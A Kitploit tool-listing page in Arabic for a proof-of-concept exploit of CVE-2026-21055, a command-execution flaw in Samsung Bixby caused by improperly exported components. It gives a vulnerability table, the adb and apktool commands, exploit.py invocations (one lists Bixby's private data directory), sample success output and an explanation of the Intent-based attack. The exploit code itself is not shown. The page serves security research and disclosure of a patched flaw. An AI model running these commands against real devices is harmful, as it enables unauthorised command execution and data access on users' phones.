Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الجوالالتعلم والتعليماستغلال الملفات الثنائية
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

إثبات مفهوم لاستغلال CVE-2026-21055 يوضح تنفيذ أوامر عشوائية عبر مكونات Android المصدرة بشكل غير صحيح في Samsung Bixby. يتضمن تحليل المكونات ونصوص هجوم تعتمد على Intent.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-21055 PoC — تصدير غير صحيح لمكونات سامسونج Bixby

إثبات المفهوم لـ CVE-2026-21055: التصدير غير الصحيح لمكونات تطبيق أندرويد في سامسونج Bixby قبل الإصدار 4.0.70.8 يسمح للمهاجمين المحليين بتنفيذ أوامر عشوائية بامتياز Bixby.

نظرة عامة

يحتوي هذا المستودع على نصين بلغة بايثون:

  1. analyze_components.py — يقوم بتحليل ملف AndroidManifest.xml المُفكك لتعداد الأنشطة والخدمات والمستقبلات والموفّرين المُصدرة. يُعلم المكونات المُصدرة دون حراس إذن.

  2. exploit.py — يوضح الهجوم القائم على Intent عن طريق إرسال Intent بث مُصنّع إلى مستقبل الأوامر المُصدر لـ Bixby عبر adb shell am، وتنفيذ أمر بامتيازات نظام Bixby.

تفاصيل الثغرة

الحقلالقيمة
معرف CVECVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — عالي
CWECWE-926 — تصدير غير صحيح لمكونات تطبيق أندرويد
التطبيق المتأثرSamsung Bixby (com.samsung.android.bixby.agent)
الإصدارات المتأثرة< 4.0.70.8
الإصدار المُصلح4.0.70.8
ناقل الهجوممحلي (تطبيق ضار على نفس الجهاز)
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء
التأثيرتنفيذ أوامر عشوائية بامتياز Bixby

المتطلبات الأساسية

  • adb (أدوات منصة Android SDK) مثبتة وفي PATH
  • جهاز سامسونج جالاكسي مع تمكين تصحيح USB
  • إصدار Bixby < 4.0.70.8 على الجهاز المستهدف
  • لتحليل المكونات: apktool مثبت وفي PATH

الاستخدام

1. تحليل المكونات المُصدرة لـ Bixby

اسحب APK لـ Bixby من الجهاز وقم بفك التجميع:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

شغّل نص التحليل:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

أو دع النص يفك التجميع تلقائياً:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. سرد المكونات المُصدرة على جهاز حي

root@kitploit:~
$ python3 exploit.py --list

3. تشغيل الاستغلال

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

المخرجات المتوقعة

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

كيف يعمل

  1. تصدير المكونات: يقوم Bixby بتصدير مكون واحد أو أكثر (خدمات/مستقبلات) تتعامل مع تنفيذ الأوامر أو محفزات الأتمتة. يتم تصدير هذه المكونات مع android:exported="true" ولكن بدون سمة android:permission أو فحوصات الإذن عند التشغيل.

  2. توصيل Intent: يمكن لأي تطبيق على الجهاز إرسال Intent إلى هذه المكونات المُصدرة. يحمل Intent سلسلة إجراء (مثل ACTION_RUN_SHELL) وإضافات نصية تحتوي على الأمر المراد تنفيذه ومسار ملف الإخراج.

  3. تنفيذ الأمر: يتلقى المكون المُصدر لـ Bixby Intent، ويستخرج الأمر، وينفذه عبر Runtime.exec() أو آلية مشابهة. يعمل الأمر في سياق عملية Bixby، ويرث جميع امتيازات نظام Bixby.

  4. لا تفاعل مستخدم: لا يتطلب الاستغلال أي تفاعل من المستخدم. يرسل التطبيق الضار Intent بصمت في الخلفية.

إخلاء مسؤولية

هذا الدليل التجريبي (PoC) مقدم للأغراض التعليمية والبحث الأمني فقط. اختبر فقط على الأجهزة التي تمتلكها أو لديك إذن صريح لاختبارها. لا تستخدم هذا الاستغلال ضد الأجهزة دون موافقة المالك.

المصادر

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • نشرة أمان سامسونج للجوال (يوليو 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
تنزيل الأداة